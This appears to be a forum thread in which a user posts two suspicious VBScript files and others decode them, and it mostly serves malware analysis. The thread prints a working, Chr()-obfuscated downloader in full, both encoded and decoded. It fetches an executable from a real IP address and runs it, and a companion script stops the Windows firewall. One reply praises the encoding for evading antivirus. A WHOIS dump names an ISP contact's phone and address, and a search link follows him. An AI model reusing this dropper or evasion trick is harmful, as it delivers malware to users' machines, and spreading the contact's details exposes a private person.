
Caught two suspicious scripts on my PC; no VB on hand and too lazy to translate them by hand, so posting the code for everyone to look at

2013-01-01 

In the system32 folder:
File 1: run.vbs
Content:

set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)

File 2: run2.vbs
Content:

set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)

Because it does not directly contain any sensitive code, the antivirus ignores it.
So I simply changed the system's default handler for VBS files from the script interpreter to Notepad.
[Solution]
... passing by, here for the points
[Solution]

?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell

?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)
Microsoft.XMLHTTP

?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
GET           http://218.11.0.167:8080/1.exe            0

?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)
ADODB.Stream

?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oky.exe       2

?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
10000

?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
oky.exe

?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell

?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
net stop sharedaccess       0

?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
%windir%\run.vbs            0
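The `?Chr(...)` decoding above can be done offline by a small script instead of typing each run into the immediate window. The following is an added example, not code from this thread: it rewrites every `Chr()` run in the posted scripts into a quoted literal by arithmetic alone (the VBS is never executed) and then lists the URLs, executable names and `.run` arguments a responder would block or hunt for. The function names are my own; the sample input is the obfuscated lines quoted in the original post.

```python
import re

# One Chr(<decimal>) call; VBScript's Chr() takes a decimal character code.
CHR_CALL = re.compile(r'Chr\((\d{1,3})\)', re.IGNORECASE)
# A run of Chr() calls joined with +, the only obfuscation the two scripts use.
CHR_RUN = re.compile(r'Chr\(\d{1,3}\)(?:\s*\+\s*Chr\(\d{1,3}\))*', re.IGNORECASE)


def decode_run(run):
    """'Chr(72)+Chr(105)' -> 'Hi', by table lookup only; nothing is executed."""
    return ''.join(chr(int(n)) for n in CHR_CALL.findall(run))


def deobfuscate(script):
    """Replace each Chr() run with a quoted VBScript literal, line by line."""
    def quote(m):
        # VBScript escapes a double quote inside a literal as "".
        return '"' + decode_run(m.group(0)).replace('"', '""') + '"'
    return '\n'.join(CHR_RUN.sub(quote, line) for line in script.splitlines())


def extract_iocs(decoded):
    """What a responder wants from the plain text: URLs, .exe names, .run arguments."""
    return {
        'urls': re.findall(r'https?://[^\s"]+', decoded),
        'executables': sorted(set(re.findall(r'[\w%\\.-]+\.exe', decoded))),
        'run_commands': re.findall(r'\.run\s+"([^"]+)"', decoded, re.IGNORECASE),
    }


# Sample input: obfuscated lines quoted in the original post (run.vbs and run2.vbs).
SAMPLE = """\
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
"""

if __name__ == '__main__':
    plain = deobfuscate(SAMPLE)
    print(plain)
    for kind, values in extract_iocs(plain).items():
        print(kind, values)
```

Point `deobfuscate` at the full run.vbs and run2.vbs text to get the same plain listing the replies below reconstruct by hand, with the strings properly quoted.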


[Solution]
run1.vbs

set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile oky.exe,2
wscript.sleep 10000
oshell.run oky.exe


run2.vbs

set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0

[Solution]

% [whois.apnic.net node-2]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

inetnum:      218.11.0.0 - 218.12.255.255
netname:      UNICOM-HE
country:      CN
descr:        China Unicom Hebei province network
descr:        China Unicom
admin-c:      CH1302-AP
tech-c:       KL984-AP
status:       ALLOCATED PORTABLE
mnt-by:       APNIC-HM
mnt-lower:    MAINT-CNCGROUP-HE
mnt-routes:   MAINT-CNCGROUP-RR
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks:      This object can only be updated by APNIC hostmasters.
remarks:      To update this object, please contact APNIC
remarks:      hostmasters and include your organisation's account
remarks:      name in the subject line.
remarks:      -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed:      *****@cnc-noc.net 20031217
changed:      **********@apnic.net 20080314
changed:      **********@apnic.net 20090508
source:       APNIC

route:        218.11.0.0/16
descr:        CNC Group CHINA169 Hebei Province Network
country:      CN
origin:       AS4837
mnt-by:       MAINT-CNCGROUP-RR
changed:      *****@cnc-noc.net 20060118
source:       APNIC

person:       ChinaUnicom Hostmaster
nic-hdl:      CH1302-AP
e-mail:       *****@chinaunicom.cn
address:      No.21,Jin-Rong Street
address:      Beijing,100140
address:      P.R.China
phone:        +86-10-66259940
fax-no:       +86-10-66259764
country:      CN
changed:      *****@chinaunicom.cn 20090408
mnt-by:       MAINT-CNCGROUP
source:       APNIC

person:       Kong Lingfei
nic-hdl:      KL984-AP
e-mail:       *******@chinaunicom.cn
address:      45, Guang An Street, Shi Jiazhuang City, HeBei Province,050011,CN
phone:        +86-311-86681601
fax-no:       +86-311-86689210
country:      cn
changed:      *******@chinaunicom.cn 20090206
mnt-by:       MAINT-CNCGROUP-HE
source:       APNIC



[Solution]
http://www.baidu.com/s?bs=%BF%D7%C1%EE%B7%C9&f=8&wd=0311-86681601&n=2&inputT=2110
[Solution]
Study scripting properly??

[Solution]
Crazy script..........
[Solution]
OP's antivirus is not up to the job.
I use Avast! and it alerts as soon as I open this page.
Copying OP's content and saving it to a file gets killed too.
[Solution]
My PC uses Microsoft's antivirus; saving that code also triggered a warning!
[Solution]
Bumping this to have a look; can it be tracked down?

[Solution]
MSE also flagged a virus when saving the code above...
[Solution]
Writing it this way gets past 360; nice one, learned something.
[Solution]
Passing by to take a look
[Solution]
There are always experts around,
[Solution]
NOD32 detected the first script; no reaction to the second
[Solution]
Just here to watch the show...
